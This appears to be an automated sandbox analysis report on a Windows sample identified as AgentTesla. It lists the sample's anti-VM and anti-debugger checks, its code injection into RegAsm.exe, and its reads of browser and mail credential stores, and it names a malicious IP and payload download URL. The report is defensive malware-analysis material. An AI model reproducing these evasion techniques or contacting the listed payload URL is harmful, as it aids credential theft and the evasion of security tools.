Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA instructions:
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08 instructions:
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect Any.run
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 0000000002102FA2 second address: 0000000002102FA2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F7E70A9D098h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test bl, dl 0x0000001f cmp eax, ebx 0x00000021 pop ecx 0x00000022 test ebx, ecx 0x00000024 add edi, edx 0x00000026 dec ecx 0x00000027 pushad 0x00000028 mov ah, F0h 0x0000002a cmp ah, FFFFFFF0h 0x0000002d jne 00007F7E70A9C5A5h 0x00000033 popad 0x00000034 cmp ecx, 00000000h 0x00000037 jne 00007F7E70A9D043h 0x00000039 push ecx 0x0000003a jmp 00007F7E70A9D0AAh 0x0000003c push esi 0x0000003d mov esi, 6EF0E26Ch 0x00000042 cmp esi, 6EF0E26Ch 0x00000048 jne 00007F7E70A9A718h 0x0000004e pop esi 0x0000004f call 00007F7E70A9D0E7h 0x00000054 call 00007F7E70A9D0A8h 0x00000059 lfence 0x0000005c mov edx, dword ptr [7FFE0014h] 0x00000062 lfence 0x00000065 ret 0x00000066 mov esi, edx 0x00000068 pushad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 000000000210319A second address: 000000000210319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70AAA270h 0x0000001d popad 0x0000001e jmp 00007F7E70AA7922h 0x00000020 test ax, dx 0x00000023 call 00007F7E70AA7934h 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 00000000021006BA second address: 00000000021006BA instructions:
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe RDTSC instruction interceptor: First address: 0000000002100853 second address: 0000000002100853 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 000000000130319A second address: 000000000130319A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F7E70A9FA00h 0x0000001d popad 0x0000001e jmp 00007F7E70A9D0B2h 0x00000020 test ax, dx 0x00000023 call 00007F7E70A9D0C4h 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000001300F6A second address: 0000000001300F6A instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000001301F08 second address: 0000000001301F08 instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0130210C rdtsc 4_2_0130210C
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 2357 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 7483 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6904 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000004.00000002.604549070.0000000020820000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0130210C rdtsc 4_2_0130210C
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00FE6B68 LdrInitializeThunk, 4_2_00FE6B68
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_013052A0 mov eax, dword ptr fs:[00000030h] 4_2_013052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01302DD2 mov eax, dword ptr fs:[00000030h] 4_2_01302DD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01305F0E mov eax, dword ptr fs:[00000030h] 4_2_01305F0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0130576C mov eax, dword ptr fs:[00000030h] 4_2_0130576C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01305EF3 mov eax, dword ptr fs:[00000030h] 4_2_01305EF3
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1300000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SKM_C3350191107102300.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\SKM_C3350191107102300.exe' Jump to behavior
Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: RegAsm.exe, 00000004.00000002.599071662.0000000001AF0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_01302214 cpuid 4_2_01302214
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356107 Sample: SKM_C3350191107102300.exe Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 18 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->18 20 Potential malicious icon found 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 3 other signatures 2->24 7 SKM_C3350191107102300.exe 2->7         started        process3 signatures4 26 Writes to foreign memory regions 7->26 28 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 7->28 30 Tries to detect Any.run 7->30 32 2 other signatures 7->32 10 RegAsm.exe 9 7->10         started        process5 dnsIp6 16 185.222.58.152, 49726, 80 ROOTLAYERNETNL Netherlands 10->16 34 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->34 36 Tries to steal Mail credentials (via file access) 10->36 38 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->38 40 6 other signatures 10->40 14 conhost.exe 10->14         started        signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.222.58.152
 unknown Netherlands
51447 ROOTLAYERNETNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin true
  • Avira URL Cloud: safe
 unknown